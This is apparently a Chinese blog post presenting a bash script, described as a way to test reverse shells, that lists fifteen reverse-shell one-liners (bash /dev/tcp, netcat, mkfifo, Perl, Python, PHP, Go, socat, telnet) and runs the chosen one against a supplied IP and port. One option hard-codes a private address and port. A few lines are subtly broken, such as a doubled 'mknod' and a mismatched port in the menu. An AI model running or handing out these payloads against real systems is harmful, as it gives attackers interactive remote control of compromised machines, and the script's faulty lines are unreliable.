使用下列脚本可以测试反弹Shell
#!/bin/bash
if [ $# == 2 ];then
IP=$1
PORT=$2
else
read -p "请输入目标IP:" IP
read -p "请输入目标Port:" PORT
fi
echo "目标IP:目标Port -> $IP:$PORT"
echo "1) bash -i >& /dev/tcp/ip/port 0>&1"
echo "2) busybox sh -i >& /dev/tcp/ip/port 0<&1"
echo "3) rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f"
echo "4) php -r '$sock=fsockopen("ip",port);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
echo "5) nc -e /bin/bash ip port"
echo "6) nc -c bash ip port"
echo "7) sh -i 5<> /dev/tcp/ip/port 0<&5 1>&5 2>&5"
echo "8) perl -e 'use Socket;$i=\"ip\";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($i,inet_aton(ip)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
echo "9) mknod backpipe p; nc ip port 0<backpipe | /bin/bash 1>backpipe 2>backpipe"
echo "10) mknod a p; telnet ip port 0<a | /bin/bash 1>a"
echo "11) echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"ip:port\");cmd:=exec.Command(\"/bin/bash\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go"
echo "12) python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"ip\",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'"
echo "13) socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ip:port"
echo "14) exec /bin/sh 0</dev/tcp/ip/port 1>&0 2>&0"
echo "15) 0<&196;exec 196<>/dev/tcp/ip/777; sh <&196 >&196 2>&196"
read -p "请输入攻击类型(q 退出):" choice
if [ "$choice" == 1 ];then
exec bash -i >& /dev/tcp/$IP/$PORT 0>&1
else if [ "$choice" == 2 ];then
busybox sh -i >& /dev/tcp/$IP/$PORT 0<&1
else if [ "$choice" == 3 ];then
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IP $PORT >/tmp/f
else if [ "$choice" == 4 ];then
php -r '$sock=fsockopen("'$IP'",'$PORT');exec("/bin/sh -i <&3 >&3 2>&3");'
else if [ "$choice" == 5 ];then
nc -e /bin/bash $IP $PORT
else if [ "$choice" == 6 ];then
nc -c bash $IP $PORT
else if [ "$choice" == 7 ];then
sh -i 5<> /dev/tcp/$IP/$PORT 0<&5 1>&5 2>&5
else if [ "$choice" == 8 ];then
perl -e 'use Socket;$i="10.244.1.179";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
else if [ "$choice" == 9 ];then
mknod backpipe p; nc $IP $PORT 0<backpipe | /bin/bash 1>backpipe 2>backpipe
else if [ "$choice" == 10 ];then
mknod mknod a p; telnet $IP $PORT 0<a | /bin/bash 1>a
else if [ "$choice" == 11 ];then
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","'$IP':'$PORT'");cmd:=exec.Command("/bin/bash");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
else if [ "$choice" == 12 ];then
python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("'$IP'",'$PORT'));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
else if [ "$choice" == 13 ];then
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$IP:$PORT
else if [ "$choice" == 14 ];then
exec /bin/sh 0</dev/tcp/$IP/$PORT 1>&0 2>&0
else if [ "$choice" == 15 ];then
0<&196;exec 196<>/dev/tcp/$IP/$PORT; sh <&196 >&196 2>&196
fi
fi
fi
fi
fi
fi
fi
fi
fi
fi
fi
fi
fi
fi
fi
版权声明:本文为SHELLCODE_8BIT原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。